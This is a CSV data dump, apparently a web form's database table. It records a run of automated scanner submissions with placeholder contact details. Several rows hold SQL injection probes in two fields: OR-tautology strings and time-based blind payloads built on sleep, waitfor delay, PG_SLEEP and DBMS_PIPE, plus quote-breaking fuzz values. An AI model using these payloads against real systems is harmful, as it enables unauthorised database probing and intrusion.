546,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:24:32",0,"1",760341454
547,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:24:32",0,"1",760341454
548,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:24:34",0,"1",760341454
549,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:24:36",0,"1",760341454
550,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:24:37",0,"1",760341454
551,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:24:38",0,"1",760341454
552,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:24:40",0,"1",760341454
553,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"1'""","1","2020-07-18 01:24:41",0,"1",760341454
554,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,\,"1","2020-07-18 01:24:42",0,"1",760341454
555,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,@@STvxj,"1","2020-07-18 01:24:45",0,"1",760341454
556,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,JyI=,"1","2020-07-18 01:24:46",0,"1",760341454
557,JCfUZQsq,"555-666-0606",sample@email.tst,"1'""","555","1","2020-07-18 01:24:54",0,"1",760341454
558,JCfUZQsq,"555-666-0606",sample@email.tst,\,"555","1","2020-07-18 01:24:56",0,"1",760341454
559,JCfUZQsq,"555-666-0606",sample@email.tst,@@KQnpm,"555","1","2020-07-18 01:25:00",0,"1",760341454
560,JCfUZQsq,"555-666-0606",sample@email.tst,JyI=,"555","1","2020-07-18 01:25:02",0,"1",760341454
561,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:25:07",0,"1'""",760341454
562,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:25:09",0,\,760341454
563,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:25:13",0,@@kldzW,760341454
564,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:25:14",0,JyI=,760341454
565,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:25:57",0,"1",760341454
566,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:25:58",0,"1",760341454
567,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:25:58",0,"1",760341454
568,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:25:59",0,"1",760341454
569,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:00",0,"1",760341454
570,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:00",0,"1",760341454
571,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:01",0,"1",760341454
572,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:01",0,"1",760341454
573,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:01",0,"1",760341454
574,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:02",0,"1",760341454
575,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:03",0,"1",760341454
576,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:05",0,"1",760341454
577,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:07",0,"1",760341454
578,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:08",0,"1",760341454
579,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:09",0,"1",760341454
580,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:10",0,"1",760341454
581,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:10",0,"1",760341454
582,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:11",0,"1",760341454
583,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:11",0,"1",760341454
584,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:12",0,"1",760341454
585,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:12",0,"1",760341454
586,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:15",0,"1",760341454
587,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:19",0,"1",760341454
588,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:21",0,"1",760341454
589,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:23",0,"1",760341454
590,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:24",0,"1",760341454
591,JCfUZQsq,"555-666-0606",-1 OR 2+656-656-1=0+0+0+1 -- ,Mr.,"555","1","2020-07-18 01:26:24",0,"1",760341454
592,JCfUZQsq,"555-666-0606",-1 OR 2+178-178-1=0+0+0+1,Mr.,"555","1","2020-07-18 01:26:26",0,"1",760341454
593,JCfUZQsq,"555-666-0606",-1' OR 2+165-165-1=0+0+0+1 -- ,Mr.,"555","1","2020-07-18 01:26:26",0,"1",760341454
594,JCfUZQsq,"555-666-0606",-1' OR 2+392-392-1=0+0+0+1 or 'IvjDeTDA'=',Mr.,"555","1","2020-07-18 01:26:27",0,"1",760341454
595,JCfUZQsq,"555-666-0606","-1"" OR 2+194-194-1=0+0+0+1 -- ",Mr.,"555","1","2020-07-18 01:26:27",0,"1",760341454
596,JCfUZQsq,"555-666-0606","700'",Mr.,"555","1","2020-07-18 01:26:27",0,"1",760341454
597,JCfUZQsq,"555-666-0606","if(now()=sysdate(),sleep(12),0)",Mr.,"555","1","2020-07-18 01:26:30",0,"1",760341454
598,JCfUZQsq,"555-666-0606","0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z",Mr.,"555","1","2020-07-18 01:26:32",0,"1",760341454
599,JCfUZQsq,"555-666-0606","0""XOR(if(now()=sysdate(),sleep(12),0))XOR""Z",Mr.,"555","1","2020-07-18 01:26:33",0,"1",760341454
600,JCfUZQsq,"555-666-0606","(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'""+(select(0)from(select(sleep(12)))v)+""*/",Mr.,"555","1","2020-07-18 01:26:36",0,"1",760341454
601,JCfUZQsq,"555-666-0606","1 waitfor delay '0:0:12' -- ",Mr.,"555","1","2020-07-18 01:26:36",0,"1",760341454
602,JCfUZQsq,"555-666-0606",Cfrd3eiy'; waitfor delay '0:0:12' -- ,Mr.,"555","1","2020-07-18 01:26:38",0,"1",760341454
603,JCfUZQsq,"555-666-0606",OfKyF17d' OR 565=(SELECT 565 FROM PG_SLEEP(12))--,Mr.,"555","1","2020-07-18 01:26:42",0,"1",760341454
604,JCfUZQsq,"555-666-0606",cnXRfxfk') OR 405=(SELECT 405 FROM PG_SLEEP(12))--,Mr.,"555","1","2020-07-18 01:26:46",0,"1",760341454
605,JCfUZQsq,"555-666-0606",cZohiBhc')) OR 145=(SELECT 145 FROM PG_SLEEP(12))--,Mr.,"555","1","2020-07-18 01:26:49",0,"1",760341454
606,JCfUZQsq,"555-666-0606","sample@email.tst'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),12)||'",Mr.,"555","1","2020-07-18 01:26:50",0,"1",760341454
607,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:53",0,"1",760341454
608,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:55",0,"1",760341454
609,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:56",0,"1",760341454
610,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:56",0,"1",760341454
611,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:57",0,"1",760341454
612,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:57",0,"1",760341454
613,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:58",0,"1",760341454
614,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:26:59",0,"1",760341454
615,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:27:01",0,"1",760341454
616,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:27:03",0,"1",760341454
617,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:27:07",0,"1",760341454
618,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:27:10",0,"1",760341454
619,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:27:12",0,"1",760341454
620,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:27:14",0,"1",760341454
621,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:27:16",0,"1",760341454
622,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:27:17",0,"1",760341454
623,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:27:18",0,"1",760341454
624,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:27:20",0,"1",760341454
625,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:27:22",0,"1",760341454
626,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:27:23",0,"1",760341454
627,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:27:25",0,"1",760341454
628,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:27:27",0,"1",760341454
629,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:27:28",0,"1",760341454
630,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:27:29",0,"1",760341454
631,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:27:32",0,"1",760341454
632,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-07-18 01:27:34",0,"1",760341454
633,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555",-1 OR 2+718-718-1=0+0+0+1 -- ,"2020-07-18 01:27:34",0,"1",760341454
634,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555",-1 OR 2+32-32-1=0+0+0+1,"2020-07-18 01:27:35",0,"1",760341454
635,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555",-1' OR 2+413-413-1=0+0+0+1 -- ,"2020-07-18 01:27:36",0,"1",760341454
636,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555",-1' OR 2+838-838-1=0+0+0+1 or '3kV3ToqM'=',"2020-07-18 01:27:36",0,"1",760341454
637,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","-1"" OR 2+592-592-1=0+0+0+1 -- ","2020-07-18 01:27:36",0,"1",760341454
638,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","174'","2020-07-18 01:27:36",0,"1",760341454
639,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","if(now()=sysdate(),sleep(12),0)","2020-07-18 01:27:37",0,"1",760341454
640,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z","2020-07-18 01:27:38",0,"1",760341454
641,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","0""XOR(if(now()=sysdate(),sleep(12),0))XOR""Z","2020-07-18 01:27:39",0,"1",760341454
642,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'""+(select(0)from(select(sleep(12)))v)+""*/","2020-07-18 01:27:41",0,"1",760341454
643,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555",-1; waitfor delay '0:0:12' -- ,"2020-07-18 01:27:48",0,"1",760341454
644,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555",-1); waitfor delay '0:0:12' -- ,"2020-07-18 01:27:52",0,"1",760341454
645,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555","1 waitfor delay '0:0:12' -- ","2020-07-18 01:27:54",0,"1",760341454
646,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555",X8r39sxb'; waitfor delay '0:0:12' -- ,"2020-07-18 01:27:55",0,"1",760341454
647,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555",-5 OR 967=(SELECT 967 FROM PG_SLEEP(12))--,"2020-07-18 01:27:56",0,"1",760341454
648,JCfUZQsq,"555-666-0606",sample@email.tst,Mr.,"555",-5) OR 200=(SELECT 200 FROM PG_SLEEP(12))--,"2020-07-18 01:27:58",0,"1",760341454
